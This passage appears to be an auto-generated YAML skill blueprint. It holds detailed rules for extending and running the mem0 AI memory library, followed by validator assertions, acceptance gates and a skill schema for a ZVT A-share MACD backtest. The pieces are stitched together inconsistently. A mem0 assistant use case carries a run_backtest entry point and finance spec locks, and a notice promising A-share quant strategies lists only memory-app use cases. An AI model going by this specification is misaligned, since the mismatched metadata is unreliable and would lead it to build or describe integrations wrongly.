      intentionally permissive). For workloads relying on exact keyword/quote matches (legal citations, code snippets), do
      not tighten threshold above 0.2 — strong BM25 matches with weak semantic similarity will be filtered out before fusion.
    severity: low
    kind: domain_rule
    modality: must
    consequence: null
  - id: mem0-C-009
    when: When subclassing MemoryBase to build an alternative backend or memory implementation
    action: Implement only the 5 abstract methods (get, get_all, update, delete, history) in your subclass. Reuse Memory's
      add()/search() concrete implementation, or write your own concrete add()/search() — do NOT promote them to abstract.
      The boundary is 'we own how memories are created from messages; you can swap how they are stored/retrieved by ID'.
    severity: high
    kind: domain_rule
    modality: must_not
    consequence: null
  - id: mem0-C-010
    when: When adding a new vector store backend by subclassing VectorStoreBase
    action: 'Implement all 11 required abstract methods. Optionally override keyword_search (defaults to None — disables BM25/keyword
      fusion in hybrid search) and search_batch (defaults to per-query loop — works but slow). Follow AGENTS.md L394-402 7-step
      provider recipe: create mem0/vector_stores/<name>.py, inherit base, add config, register in factory.py L168-193, add
      tests.'
    severity: high
    kind: domain_rule
    modality: must
    consequence: null
  - id: mem0-C-011
    when: When adding a new LLM provider by subclassing LLMBase, especially for non-OpenAI-compatible models (Ollama models
      without grammar, vLLM models, custom inference)
    action: Implement generate_response and ensure that when response_format={'type':'json_object'} is passed in kwargs, your
      provider returns valid JSON text. If your underlying API has no JSON mode, prepend a system instruction and post-validate;
      the extract_json fallback in mem0/memory/utils.py:125-142 handles loose JSON but does NOT recover arbitrary natural-language
      replies — caller will see [] (silent extraction failure).
    severity: high
    kind: domain_rule
    modality: must
    consequence: null
  - id: mem0-C-012
    when: When adding a new embedding provider by subclassing EmbeddingBase
    action: Implement embed(text, memory_action). The memory_action hint lets providers route to different model variants
      (e.g. text-embedding-3 'asymmetric' query vs document modes). For batch performance, override embed_batch(texts, memory_action)
      to use the provider's native batch endpoint — Phase 3 always tries embed_batch first.
    severity: medium
    kind: domain_rule
    modality: must
    consequence: null
  - id: mem0-C-013
    when: When adding a new reranker provider by subclassing BaseReranker
    action: Implement rerank(query, documents, top_k). Each output document MUST have a 'rerank_score' field (float). Handle
      your own provider errors gracefully — uncaught exceptions cause the pipeline to log warning + fall back to the un-reranked
      list (silent quality regression). Register in mem0/utils/factory.py:220-226 RerankerFactory.provider_to_class.
    severity: medium
    kind: domain_rule
    modality: must
    consequence: null
  - id: mem0-C-014
    when: When refactoring _add_to_vector_store or wrapping mem0 add() in a custom backgrounded handler
    action: 'Preserve strict stage order: every Phase N reads outputs of Phase N-1. Phase 0''s bounded message buffer feeds
      Phase 2''s prompt; Phase 1''s retrieved memories feed Phase 2''s UUID-to-int mapping; Phase 2''s extraction feeds Phase
      3''s embedding batch; etc. Do not move LLM extraction to background or parallelize Phase 6 vector insert with Phase
      8 message persist.'
    severity: high
    kind: domain_rule
    modality: must
    consequence: null
  - id: mem0-C-015
    when: When designing a high-concurrency workload using AsyncMemory and expecting true async fan-out
    action: 'Treat AsyncMemory as an asyncio-friendly facade, not native async I/O. For high-throughput concurrent search()/add():
      (a) increase the default thread pool size via asyncio.get_event_loop().set_default_executor(ThreadPoolExecutor(max_workers=N));
      (b) batch operations where possible; (c) for true async, wrap your own backend client and bypass AsyncMemory.'
    severity: medium
    kind: domain_rule
    modality: must_not
    consequence: null
  - id: mem0-C-016
    when: When choosing or switching the vector_store backend in MemoryConfig
    action: Verify keyword_search availability for your backend choice in mem0/vector_stores/<name>.py. If switching from
      Qdrant to a vector-only backend (chroma/faiss/etc), expect hybrid search degradation to vector-only and adjust threshold/top_k
      accordingly. After switching backends, re-index from scratch — embedding cosine geometry differs across embedder families
      and stored vectors are not portable across embedders.
    severity: medium
    kind: domain_rule
    modality: should
    consequence: null
  - id: mem0-C-017
    when: When initializing MemoryConfig in production where vendor / cost / data-residency constraints apply
    action: Explicitly override LlmConfig.provider, EmbeddingConfig.provider, and (if used) RerankerConfig.provider in MemoryConfig
      — do not rely on the OpenAI/cohere defaults. Document the chosen providers in your skill or wrapper. Be aware that switching
      embedders requires re-indexing stored vectors (cosine geometry differs).
    severity: medium
    kind: domain_rule
    modality: should_not
    consequence: null
  - id: mem0-C-018
    when: When migrating from v2 to v3 expecting reranker to fire automatically
    action: Pass rerank=True explicitly on every search() call where you want reranking; OR wrap Memory.search() in your own
      helper that injects rerank=True. Configure RerankerConfig in MemoryConfig (without args defaults to cohere; pass {'provider':'huggingface'/'sentence_transformer'/'llm_reranker'/'zero_entropy'}
      to override). Verify self.reranker is not None or rerank() never fires.
    severity: medium
    kind: domain_rule
    modality: should
    consequence: null
  - id: mem0-C-019
    when: When evaluating retrieval quality with default threshold=0.1 on production traffic
    action: 'Measure your embedder''s empirical noise floor: search() with threshold=0.0 over a held-out query set, plot semantic_score
      histogram of relevant vs irrelevant memories, set threshold to the inflection point (typically 0.3-0.5 for OpenAI text-embedding-3).
      Re-validate after any embedder switch (BD-002).'
    severity: medium
    kind: domain_rule
    modality: should_not
    consequence: null
  - id: mem0-C-020
    when: When porting code from v2 (top_k=100 default) to v3, or when the default 20 results are insufficient
    action: 'Pass top_k explicitly: search(query, filters={...}, top_k=N). Be aware that internal_limit = max(top_k*4, 60)
      drives the actual vector_store.search size — raising top_k linearly raises backend RPC payload. The 60 absolute floor
      ensures BM25 normalization has enough signal even for small top_k.'
    severity: medium
    kind: domain_rule
    modality: must
    consequence: null
  - id: mem0-C-021
    when: When switching to a non-OpenAI embedder while expecting entity-store behavior to remain stable
    action: 'After switching embedders: empirically measure your embedder''s cosine distribution over a sample of (entity,
      near-duplicate-entity) and (entity, unrelated-entity) pairs; pick a threshold where false-merge rate ≤ false-split rate
      × 10 (false merge is much costlier than over-extraction). Patch mem0/memory/main.py:426 and 918 directly — there is
      no config knob for this in v2.0.0.'
    severity: medium
    kind: domain_rule
    modality: must
    consequence: null
  - id: mem0-C-022
    when: When tuning hybrid search relevance via ENTITY_BOOST_WEIGHT or normalizer parameters
    action: 'If raising ENTITY_BOOST_WEIGHT above 0.5: tighten entity dedup (BD-009) above 0.95 to prevent false-merged entities
      from dominating. If switching BM25 normalizer: re-validate breakpoint thresholds (≤3, ≤6, ≤9, ≤15 terms) in mem0/utils/scoring.py:16-40.
      Always run an A/B regression on a held-out query set after any constant change.'
    severity: medium
    kind: domain_rule
    modality: must
    consequence: null
  - id: mem0-C-023
    when: When deciding whether to pay the LLM extraction cost on every add() call
    action: 'Default to infer=True for memory-layer use cases (chatbots, agents, personalization). Use infer=False only for:
      (a) transcript archival where raw messages must be replayable; (b) cost-sensitive batch ingestion with downstream re-extraction.
      Never mix the two modes within the same session_scope — payload schema differs (infer=False writes role/actor_id, infer=True
      writes extracted memory text).'
    severity: medium
    kind: domain_rule
    modality: must
    consequence: null
  - id: mem0-C-024
    when: When the Phase 0 context window of 10 messages is insufficient or excessive for your extraction quality / cost tradeoff
    action: Patch BOTH mem0/memory/storage.py:282-291 (eviction LIMIT) AND mem0/memory/main.py:703 (get_last_messages limit)
      to keep them consistent. Increasing the cap raises Phase 2 LLM prompt cost linearly; decreasing it reduces cross-message
      disambiguation quality. Document the chosen value in your fork or wrapper.
    severity: low
    kind: domain_rule
    modality: should
    consequence: null
  - id: mem0-C-025
    when: When deploying mem0 in a multi-tenant or shared-host environment
    action: Set MEM0_DIR=/tenant-specific-path before instantiating Memory(), OR pass MemoryConfig(history_db_path='/path/to/tenant-N/history.db').
      Single-user dev / single-tenant deployments may keep the default. Audit your deployment for accidental tenant collisions
      on shared servers (e.g. multiple workers running as same OS user).
    severity: high
    kind: domain_rule
    modality: must
    consequence: null
  - id: mem0-C-026
    when: When upgrading mem0 SDK across versions where the history table schema may have changed
    action: 'Before any SDK upgrade in production: cp ~/.mem0/history.db ~/.mem0/history.db.backup-$(date +%Y%m%d). Inspect
      the new mem0/memory/storage.py:_migrate_history_table after upgrade to verify which columns will be dropped. Single-process
      SQLite is safe for the auto-migration; shared db (rare for SQLite) is not.'
    severity: medium
    kind: domain_rule
    modality: should
    consequence: null
  - id: mem0-C-027
    when: When entity-aware retrieval quality requires semantic entity recognition beyond syntactic NER (e.g. linking 'the
      CEO' to 'Tim Cook')
    action: 'Either: (a) accept syntactic-only entity coverage and rely on semantic_score for the rest of retrieval; (b) fork
      mem0/utils/entity_extraction.py to call your LLM with an entity-extraction prompt; (c) inject a pre-processor that resolves
      coreferences before add(). The spaCy approach is intentional cost optimization (avoid second LLM round-trip per add()).'
    severity: medium
    kind: domain_rule
    modality: must
    consequence: null
  - id: mem0-C-028
    when: When using a non-OpenAI LLM provider whose JSON-mode support is uncertain
    action: '(a) Verify your LLM model supports response_format={''type'':''json_object''} (test with a manual call). (b)
      Instrument add() calls to monitor returned-memory count vs message-list length: if many adds return [], extraction is
      silently failing. (c) For OSS/local models, consider adding a strict-grammar wrapper or post-extraction validator. (d)
      Switch to a model with native JSON mode if extraction quality is critical.'
    severity: high
    kind: domain_rule
    modality: should
    consequence: null
  - id: mem0-C-029
    when: When refactoring _add_to_vector_store or designing an alternative extraction pipeline
    action: 'Preserve the uuid_mapping bidirectional dict: dict[int_str → uuid] before LLM call, dict[uuid → int_str] for
      parsing the LLM''s response. After LLM returns extracted memories with int IDs, remap back to UUIDs before issuing UPDATE/DELETE
      against the vector store. If you must change the mapping representation, A/B test against a corpus of UUIDs to verify
      non-regression on hallucination rate.'
    severity: high
    kind: domain_rule
    modality: must
    consequence: null
  - id: mem0-C-030
    when: When operating mem0 in production with vector store backends prone to transient failures (network, rate-limit, OOM)
    action: '(a) Wrap add() in retry-with-backoff at the application layer — on exception, do NOT trust that history reflects
      vector store state. (b) Periodically reconcile: SELECT id FROM history WHERE event=''ADD'' MINUS vector_store.list ids
      → these are orphaned history rows, vector_store.insert with original payload from history.new_memory column. (c) Monitor
      add() exception rate; spikes correlate with cross-store divergence.'
    severity: medium
    kind: domain_rule
    modality: should
    consequence: null
  - id: mem0-C-031
    when: When using mem0 with health, financial, legal, or other regulated personal data
    action: 'Implement a PII redaction step in your wrapper BEFORE calling add(): pass messages through Presidio / spaCy +
      regex / your compliance stack, replacing PII spans with tokens (e.g. <NAME_1>, <SSN>). Note the related risk: PostHog
      telemetry only sees MD5-hashed caller IDs (mem0-C-004) but the actual memory text never reaches telemetry — so this
      is a stored-data compliance issue, not transmission. Document redaction policy alongside your mem0 deployment.'
    severity: high
    kind: domain_rule
    modality: must_not
    consequence: null
  - id: mem0-C-032
    when: When ingesting large transcripts or batched messages via single add() calls
    action: '(a) Cap your add() message-list length to ~10-20 messages or estimate token count and stay under 50% of model
      context. (b) For large transcripts, chunk and call add() multiple times. (c) Monitor: if len(add_result) == 0 for a
      non-trivial input, treat as extraction failure not ''nothing to extract''. (d) Implement client-side rate limiting against
      your LLM provider''s quota.'
    severity: medium
    kind: domain_rule
    modality: must
    consequence: null
  - id: mem0-C-033
    when: When operating mem0 in production where LLM provider reliability varies
    action: 'Wrap Memory.add() in a retry-and-failover layer: on len(result)==0 OR exception, retry with the same model after
      backoff; on repeated failure, retry with a different LLM provider configured as fallback. Emit observability events
      on each retry/fallback. Track success-rate per provider. Without this, transient LLM hiccups silently lose memories
      with no audit trail.'
    severity: medium
    kind: domain_rule
    modality: should
    consequence: null
  - id: mem0-C-034
    when: When implementing audit / compliance flows requiring 'what was deleted' visibility, or when planning recovery from
      accidental deletes
    action: 'If you need soft-delete semantics: (a) wrap Memory.delete() and instead set a custom payload flag (e.g. metadata.deleted_at
      = timestamp), filter it out in your search wrapper. (b) For accidental-delete recovery, take vector store snapshots
      on a schedule. (c) For audit, supplement SQLite history with your own event log capturing full pre-delete payload. The
      built-in history table is event-only audit, NOT a snapshot store.'
    severity: medium
    kind: domain_rule
    modality: must_not
    consequence: null
  - id: mem0-C-035
    when: When using a managed vector store with a per-record payload size limit (Pinecone, hosted Qdrant, etc.)
    action: '(a) Verify your vector store''s payload-size limit and add a pre-flight truncation/split at the wrapper level:
      if len(memory_text) > limit, truncate or split into multiple memories before add(). (b) Catch backend-specific size
      errors in your add() wrapper and degrade gracefully (log + skip vs hard fail). (c) Monitor average and p99 memory text
      length to size your truncation policy.'
    severity: low
    kind: domain_rule
    modality: should
    consequence: null
  - id: mem0-C-036
    when: When extending mem0 payload schema to surface a new field at the top level of get()/search() responses
    action: 'Patch BOTH locations consistently: (a) mem0/memory/main.py:807-816 to add the new key into the payload dict written
      to vector store. (b) mem0/memory/main.py:988-994 (get) AND :1401-1434 (search formatter) core_and_promoted_keys set
      to add the new key, so it surfaces at top level on responses instead of being buried under metadata. Forgetting either
      side leaves the field invisible or in the wrong location.'
    severity: medium
    kind: domain_rule
    modality: must
    consequence: null
  - id: mem0-C-037
    when: When implementing a new vector store backend that has embedded/local mode similar to Qdrant's RocksDB-backed local
      files
    action: 'If your backend has a single-process embedded mode with file-level locking: detect that mode in your VectorStoreBase
      subclass __init__ and reuse the same client instance for both the main collection and the ''_entities'' collection.
      Reference implementation: mem0/memory/main.py:393-410 _init_entity_store branches on isinstance(self.vector_store, Qdrant)
      and the embedded flag.'
    severity: high
    kind: domain_rule
    modality: must
    consequence: null
  - id: mem0-C-038
    when: When tempted to 'clean up' history table rows during operation (e.g. delete events older than N days, or update
      old_memory text)
    action: Treat history table as immutable audit log on the operational path. If you need to age out old history, do so
      via a separate offline export-then-truncate process during maintenance windows; never UPDATE/DELETE rows from a running
      application instance. For test isolation use Memory.reset() (which DROPs everything cleanly), not row-level mutation.
    severity: medium
    kind: domain_rule
    modality: must
    consequence: null
  - id: mem0-C-039
    when: When parsing Memory.search() or Memory.get() results, or when adding custom backend fields
    action: '(a) Consumer code: rely on the 7 fields existing in every memory dict; check for None on the optional 5 before
      use. (b) Backend extension: write any custom field into payload but ensure it surfaces under metadata, not as a top-level
      promoted key (unless added through the procedure in mem0-C-036). (c) Do not add new required fields to MemoryItem without
      a SDK major version bump — every consumer expects exactly these 7.'
    severity: high
    kind: domain_rule
    modality: must
    consequence: null
  - id: mem0-C-040
    when: When designing session lifecycle and choosing how to set/reuse run_id across user interactions
    action: '(a) For continuous personalization (chatbot remembers across all sessions for one user): omit run_id, rely on
      user_id alone — accept context bleed across sessions. (b) For session-isolated workflows (each conversation independent):
      always pass a fresh run_id (e.g. uuid4()) per session. (c) For audit isolation (each task / sub-agent kept separate):
      combine agent_id + run_id per task. Document your run_id strategy.'
    severity: medium
    kind: domain_rule
    modality: should
    consequence: null
  - id: mem0-C-041
    when: When customizing or replacing the ADDITIVE_EXTRACTION_PROMPT in mem0/configs/prompts.py
    action: 'Preserve the agent-only branch behavior: when agent_id is present and user_id is absent, your prompt should bias
      the LLM toward agent-scratch semantics (e.g. ''these are notes the agent makes for itself, not user-facing facts'').
      Without this hint, agent-only extraction produces user-style memory text that conflates agent state with user state.'
    severity: medium
    kind: domain_rule
    modality: must
    consequence: null
  - id: mem0-C-042
    when: When the memory store grows past ~10K memories per user_id and dedup quality starts degrading
    action: '(a) Monitor: for a sample of add() calls, log how many semantically-similar existing memories sit at rank 11-30;
      if non-trivial, the top-10 cap is the bottleneck. (b) Mitigation: shrink session_scope so each scope''s existing-memory
      pool is smaller; OR fork _add_to_vector_store at L707-714 to raise the limit (linear LLM prompt cost growth). (c) Schedule
      offline consolidation jobs that re-extract over the full corpus.'
    severity: medium
    kind: domain_rule
    modality: must
    consequence: null
  - id: mem0-C-043
    when: When using mem0 v3 advanced filter operators for compound queries
    action: 'Use nested dict syntax: filters={''AND'': [...], ''OR'': [...], ''NOT'': [...], ''metadata.field'': {''eq'':
      value, ''gt'': value}}. The advanced operators must remain inside filters; mem0/memory/main.py:1239-1314 _parse_advanced_filters
      dispatches based on key shape. Test compound filters in dev before shipping — error messages are not always clear about
      which clause is malformed.'
    severity: medium
    kind: domain_rule
    modality: must
    consequence: null
  - id: mem0-C-044
    when: When tuning hybrid search relevance and seeing items that 'should be top-K' showing up only because of BM25/entity
      boost from beyond rank 20
    action: 'Trace whether high-final-score items consistently come from semantic ranks 20-60 or 60+. If from 20-60, current
      4× is fine. If from 60+, raise the multiplier (cost: linearly higher backend RPC). Patch mem0/memory/main.py:1356-1359
      directly — there is no config knob in v2.0.0. Always A/B test on held-out queries after change.'
    severity: low
    kind: domain_rule
    modality: should
    consequence: null
  - id: mem0-C-045
    when: When advocating mem0 OSS adoption to stakeholders or making capacity-planning decisions based on doc-stated benchmarks
    action: (a) Run your own benchmark on your workload, not on LOCOMO. (b) Compare against the alternative you would otherwise
      choose (full-context, naive vector store, your existing memory layer) — not against generic 'OpenAI Memory'. (c) Distinguish
      hosted MemoryClient performance (the benchmark target) from self-hosted Memory performance (potentially different —
      extraction LLM choice, vector store choice all dominate).
    severity: medium
    kind: domain_rule
    modality: must_not
    consequence: null
  - id: mem0-C-046
    when: When extending mem0 with a new provider
    action: 'Follow the 7 steps in order. After step 3, verify by instantiating MemoryConfig(<category>={''provider'': ''your_name'',
      ...}) — if KeyError raised, the factory registration was missed. Reference an existing provider as template (e.g. for
      LLM, copy mem0/llms/ollama.py structure).'
    severity: medium
    kind: domain_rule
    modality: should
    consequence: null
  - id: mem0-C-047
    when: When operating mem0 in an environment that needs partial telemetry — e.g. allow operational metrics but block lifecycle
      events that leak deployment timing
    action: 'For all-or-nothing: MEM0_TELEMETRY=false. For selective control: import mem0.memory.telemetry; replace _sampling_before_send
      with a custom predicate that filters by event name; do this BEFORE first Memory() instantiation. Alternative: vendor
      a forked telemetry.py with the bound logic. Document which events you suppress for compliance auditors.'
    severity: medium
    kind: domain_rule
    modality: must
    consequence: null
  - id: mem0-C-048
    when: When parsing return values of add(), search(), or get_all()
    action: '(a) For add(): result is a list — iterate directly: for entry in result: print(entry[''event''], entry[''memory'']).
      (b) For search() and get_all(): result is dict — unwrap: memories = result[''results'']; for m in memories: ... (c)
      Do not write code that expects ''relations'' to exist on any response shape in OSS v2.0.0; that key only exists in hosted/future
      versions. (d) Use response_envelope helpers (if you write your own wrapper) to abstract the difference safely.'
    severity: high
    kind: domain_rule
    modality: must
    consequence: null
  - id: mem0-C-049
    when: When deploying mem0 for non-English content, domain-specific jargon, or alternative embedders where BM25 score distributions
      differ from English-OpenAI baseline
    action: (a) Sample raw BM25 scores from your workload across query lengths; if distribution differs significantly from
      sigmoid output (most scores cluster at 0 or 1, not spread), the breakpoints are mis-tuned. (b) Patch mem0/utils/scoring.py:16-40
      get_bm25_params with breakpoints fitted to your distribution. (c) Always re-run end-to-end retrieval evaluation after
      change — sigmoid steepness affects fusion weighting.
    severity: low
    kind: domain_rule
    modality: should
    consequence: null
  - id: mem0-C-050
    when: When choosing between MemoryClient and Memory, or when copy-pasting code from cross-mode examples
    action: 'Identify the mode at the top of any mem0 integration: hosted = `from mem0 import MemoryClient; client = MemoryClient(api_key=...)`;
      OSS self-hosted = `from mem0 import Memory; m = Memory(MemoryConfig(...))`. Document the chosen mode in your code header.
      Do not mix patterns from cross-mode examples without verifying applicability — graph features (mem0-C-001), wait-2-3s
      (mem0-C-003), and the sync/eventual-consistency model all differ.'
    severity: high
    kind: domain_rule
    modality: must_not
    consequence: null
  - id: mem0-C-051
    when: When designing backup / restore / point-in-time recovery for mem0-backed systems
    action: '(a) Schedule periodic vector_store snapshots (Qdrant snapshot API, Pinecone collection backup, etc.). (b) Schedule
      periodic SQLite history.db backups. (c) Restore procedure: restore vector_store snapshot to time T, replay history events
      from T onwards if needed. (d) Do not rely on history alone for restore — UPDATE events keep old_memory text but DELETE
      events do not preserve full payload.'
    severity: high
    kind: domain_rule
    modality: must
    consequence: null
  - id: mem0-C-052
    when: When designing backfill, replay, or batch re-processing flows that re-run entity extraction over historic memories
    action: '(a) Avoid retroactive _link_entities_for_memory calls in production data path. (b) For backfill: process strictly
      in chronological order (oldest first); never re-link a memory with entities extracted from later memories. (c) Add a
      created_at comparison guard before linking if you must support out-of-order processing. (d) Document any backfill scripts
      to disclose the time-ordering invariant they assume.'
    severity: low
    kind: domain_rule
    modality: must
    consequence: null
output_validator:
  assertions:
  - id: OV-01
    check_predicate: all(p in inspect.getsource(zvt.factors.algorithm.macd) for p in ['slow=26', 'fast=12', 'n=9'])
    failure_message: 'FATAL: MACD params drifted from (fast=12, slow=26, n=9) — SL-08 violation, non-reproducible signals'
    business_meaning: Standard MACD parameters are a semantic lock; drift makes results incomparable with industry-standard
      indicators and non-reproducible.
    source_ids:
    - SL-08
    - BD-036
  - id: OV-02
    check_predicate: result.get('total_trades', 0) > 0 or result.get('explicit_zero_trade_ack') is True
    failure_message: Zero trades executed — likely missing pre-fetched data (see PC-02) or over-restrictive filters
    business_meaning: A backtest with zero trades is not a valid result; either data is missing or the strategy never triggered.
      Structural non-emptiness check is insufficient — we need business confirmation.
    source_ids:
    - SL-01
    - finance-C-073
  - id: OV-03
    check_predicate: result.get('annual_return') is None or abs(float(result['annual_return'])) <= 5.0
    failure_message: 'FATAL: |annual_return| > 500% — likely look-ahead bias or data error'
    business_meaning: Annual returns exceeding 500% are physically implausible for A-share strategies; indicates look-ahead
      bias or corrupt data.
    source_ids: []
  - id: OV-04
    check_predicate: result.get('holding_change_pct') is None or abs(float(result['holding_change_pct'])) <= 1.0
    failure_message: 'FATAL: |holding_change_pct| > 100% — physically impossible'
    business_meaning: Holding change percentage cannot exceed 100%; violation indicates position accounting error.
    source_ids:
    - BD-029
  - id: OV-05
    check_predicate: result.get('max_drawdown') is None or abs(float(result['max_drawdown'])) <= 1.0
    failure_message: 'FATAL: |max_drawdown| > 100% — impossible for non-leveraged account'
    business_meaning: Maximum drawdown cannot exceed 100% without leverage; violation indicates calculation error or look-ahead
      bias.
    source_ids: []
  - id: OV-06
    check_predicate: not (hasattr(result, 'trade_log') and result.trade_log and any(result.trade_log[i].action == 'sell' and
      i+1 < len(result.trade_log) and result.trade_log[i+1].action == 'buy' and result.trade_log[i].timestamp == result.trade_log[i+1].timestamp
      for i in range(len(result.trade_log)-1)))
    failure_message: 'FATAL: buy-before-sell detected in same cycle — SL-01 violation, creates implicit leverage'
    business_meaning: SL-01 requires sell() before buy() in each cycle; violation means available_long was not updated before
      buying, risking duplicate positions.
    source_ids:
    - SL-01
  scaffold:
    validate_py_path: '{workspace}/validate.py'
    tail_block: "# === DO NOT MODIFY BELOW THIS LINE ===\nif __name__ == \"__main__\":\n    result = run_backtest()\n    from\
      \ validate import enforce_validation\n    enforce_validation(result, output_path=\"{workspace}/result.csv\")\n# ===\
      \ END DO NOT MODIFY ==="
  enforcement_protocol: 1. Never edit validate.py. 2. Never delete the DO NOT MODIFY tail block from the main script. 3. Never
    wrap enforce_validation() in try/except. 4. Never rewrite result write logic — it MUST go through enforce_validation.
    5. If validate.py raises ImportError, fix the dependency, do not remove the call.
acceptance:
  hard_gates:
  - id: G1
    check: '{workspace}/result.csv exists AND file size > 0'
    on_fail: Strategy did not produce output; check run_backtest() return value and enforce_validation() call
  - id: G2
    check: '{workspace}/result.csv.validation_passed marker file exists'
    on_fail: Validation did not complete; review validate.py output and fix assertion failures
  - id: G3
    check: 'Main script contains literal: from validate import enforce_validation'
    on_fail: Validation chain stripped; re-add the import in the DO NOT MODIFY block
  - id: G4
    check: 'Main script contains literal: # === DO NOT MODIFY BELOW THIS LINE ==='
    on_fail: Validation fence removed; regenerate DO NOT MODIFY tail block
  - id: G5
    check: 'result.csv has at least 1 row: pandas.read_csv(result.csv).shape[0] >= 1'
    on_fail: Empty result; check if trade_log is non-empty and factors generated signals. Confirm PC-02 (k-data exists) passed.
  - id: G6
    check: 'If MACD strategy: source contains ''slow=26'' AND ''fast=12'' AND ''n=9'' in algorithm call'
    on_fail: MACD params drifted from SL-08 lock; restore standard (12, 26, 9)
  - id: G7
    check: 'For data pipeline tasks: result.csv contains ''entity_id'' and ''timestamp'' fields'
    on_fail: Missing required columns; check Mixin.query_data return schema and DataFrame MultiIndex reset_index() before
      writing
  - id: G8
    check: 'OV-03 passes: abs(annual_return) <= 5.0 (500%)'
    on_fail: Physical plausibility check failed; investigate look-ahead bias or data corruption in input kdata
  soft_gates:
  - id: SG-01
    rubric: 'Strategy narrative consistency: user intent aligns with generated strategy.py logic. dim_a: signal direction
      (buy/sell) matches intent [1-5, pass>=4]; dim_b: frequency (daily/intraday) aligns [1-5, pass>=4]; dim_c: risk controls
      match user intent [1-5, pass>=4].'
  - id: SG-02
    rubric: 'Factor combination quality. dim_a: no highly correlated factor duplication [1-5, pass>=4]; dim_b: multi-period
      alignment correct [1-5, pass>=4]; dim_c: liquidity filter present for A-share [1-5, pass>=4].'
  - id: SG-03
    rubric: 'Data source selection appropriateness. dim_a: coverage sufficient for target entities [1-5, pass>=4]; dim_b:
      provider latency acceptable for strategy frequency [1-5, pass>=4]; dim_c: no unauthorized provider used without credentials
      [1-5, pass>=4].'
skill_crystallization:
  trigger: all_hard_gates_passed AND user_opt_out_skill_saving != true
  output_path_template: '{workspace}/../skills/{slug}.skill'
  slug_template: '{blueprint_id_short}-{uc_id_lower}'
  captured_fields:
  - name
  - intent_keywords
  - entry_point_script
  - validate_script
  - fatal_constraints
  - spec_locks
  - preconditions
  - install_recipes
  - human_summary_translated
  action: 'After all Hard Gates PASS, resolve slug via slug_template using the executed UC, then write the .skill YAML file
    at output_path_template. Notify user in their detected locale: ''Skill saved as {slug}.skill — next time say one of {sample_triggers}
    from the matched UC to invoke directly.'''
  violation_signal: All hard gates passed but no .skill file exists at expected path
  skill_file_schema:
    name: finance-bp-131 / Personal AI Assistant with Image+Text Memory (agno)
    version: v6.1
    intent_keywords:
    - personal assistant
    - image memory
    - multimodal memory
    - agno
    entry_point: run_backtest
    fatal_guards:
    - SL-01
    - SL-02
    - SL-03
    - SL-04
    - SL-05
    - SL-06
    - SL-07
    - SL-08
    - SL-10
    - SL-11
    - SL-12
    spec_locks:
    - SL-01
    - SL-02
    - SL-03
    - SL-04
    - SL-05
    - SL-06
    - SL-07
    - SL-08
    - SL-09
    - SL-10
    - SL-11
    - SL-12
    preconditions:
    - PC-01
    - PC-02
    - PC-03
    - PC-04
post_install_notice:
  trigger: skill_installation_complete
  message_template:
    positioning: I help you build quant strategies on A-share with ZVT — from data fetch to backtest, one flow.
    capability_catalog:
      group_strategy:
        source: auto_grouped
        strategy_reason: auto-grouped by UC.type (2 distinct values, balanced distribution)
      groups:
      - group_id: complete_strategy
        name: Complete Strategy
        description: ''
        emoji: 📦
        uc_count: 16
        ucs:
        - uc_id: UC-001
          name: Personal AI Assistant with Image+Text Memory (agno)
          short_description: Build a personal AI assistant with persistent multimodal memory
          sample_triggers:
          - personal assistant
          - image memory
          - multimodal memory
        - uc_id: UC-002
          name: AI Study Buddy with Spaced Repetition
          short_description: Track topics studied, schedule spaced repetition, and remember struggle areas across study sessions
          sample_triggers:
          - study assistant
          - spaced repetition
          - learning tracking
        - uc_id: UC-003
          name: Healthcare Assistant (Google ADK)
          short_description: Healthcare assistant that stores patient info scoped by user_id
          sample_triggers:
          - healthcare
          - patient memory
          - Google ADK
        - uc_id: UC-004
          name: Memory-Aware Movie Recommender (Grok-3 + Qdrant)
          short_description: Recommend movies using Grok-3 with persistent user-preference memory in a local Qdrant collection
            (embedding_model_dims=384)
          sample_triggers:
          - recommender system
          - movie
          - Grok-3
        - uc_id: UC-005
          name: Voice Diet Assistant (Cartesia)
          short_description: Voice-driven diet assistant that remembers food preferences, allergies, and dietary patterns
            across voice sessions
          sample_triggers:
          - voice assistant
          - diet
          - food preferences
        - uc_id: UC-006
          name: Voice Assistant with Persistent Memory (ElevenLabs)
          short_description: Voice assistant using ElevenLabs TTS/STT, with mem0 for cross-session memory of user preferences
          sample_triggers:
          - voice assistant
          - ElevenLabs
        - uc_id: UC-007
          name: Personalized Search with Stored Preferences
          short_description: Personalize search results using stored user preferences as a re-ranking signal on top of standard
            search
          sample_triggers:
          - personalized search
          - preference-aware ranking
          - rerank
        - uc_id: UC-009
          name: AWS Strands Agent with Elasticache Vector + Neptune Graph
          short_description: AWS-stack agent with Elasticache vector and Neptune graph backends
          sample_triggers:
          - AWS
          - Strands
          - Elasticache
        - uc_id: UC-010
          name: Fitness Tracking Assistant
          short_description: Track workout sessions, fitness goals, and progress across check-ins
          sample_triggers:
          - fitness
          - workout tracking
          - goals
        - uc_id: UC-012
          name: Multi-Agent Personal Learning System (LlamaIndex)
          short_description: Multi-agent learning system using LlamaIndex AgentWorkflow with FunctionAgents and shared mem0
            memory layer
          sample_triggers:
          - multi-agent
          - LlamaIndex
          - AgentWorkflow
        - uc_id: UC-013
          name: Next.js Mem0 Demo
          short_description: Reference Next.js app demonstrating client-side mem0 integration via the TypeScript SDK
          sample_triggers:
          - Next.js
          - TypeScript SDK
          - web app demo
        - uc_id: UC-014
          name: Multimodal (Image+Text) Vite Demo
          short_description: Vite-based demo of multimodal memory (image + text) with the TypeScript SDK
          sample_triggers:
          - multimodal
          - Vite
          - image + text memory
        - uc_id: UC-016
          name: YouTube Assistant Chrome Extension
          short_description: Chrome extension that watches YouTube and answers questions about previously-watched videos using
            mem0 for cross-video memory
          sample_triggers:
          - YouTube
          - Chrome extension
          - video assistant
        - uc_id: UC-018
          name: Customer Support Chatbot with Persistent Customer Memory
          short_description: Customer support chatbot that remembers customer preferences, past tickets, account details across
            sessions
          sample_triggers:
          - customer support
          - persistent memory
          - chatbot
        - uc_id: UC-019
          name: AutoGen Multi-Agent + Mem0 Memory
          short_description: Microsoft AutoGen multi-agent setup with mem0 as the shared memory layer
          sample_triggers:
          - AutoGen
          - multi-agent
          - shared memory
        - uc_id: UC-021
          name: Canonical retrieve→generate→store Integration Pattern (SKILL.md normative)
          short_description: Canonical mem0 chat(user_input, user_id) integration pattern
          sample_triggers:
          - retrieve generate store
          - canonical pattern
          - chat function
      - group_id: extension_example
        name: Extension Example
        description: ''
        emoji: 📦
        uc_count: 5
        ucs:
        - uc_id: UC-008
          name: Multi-LLM Memory Co-Write
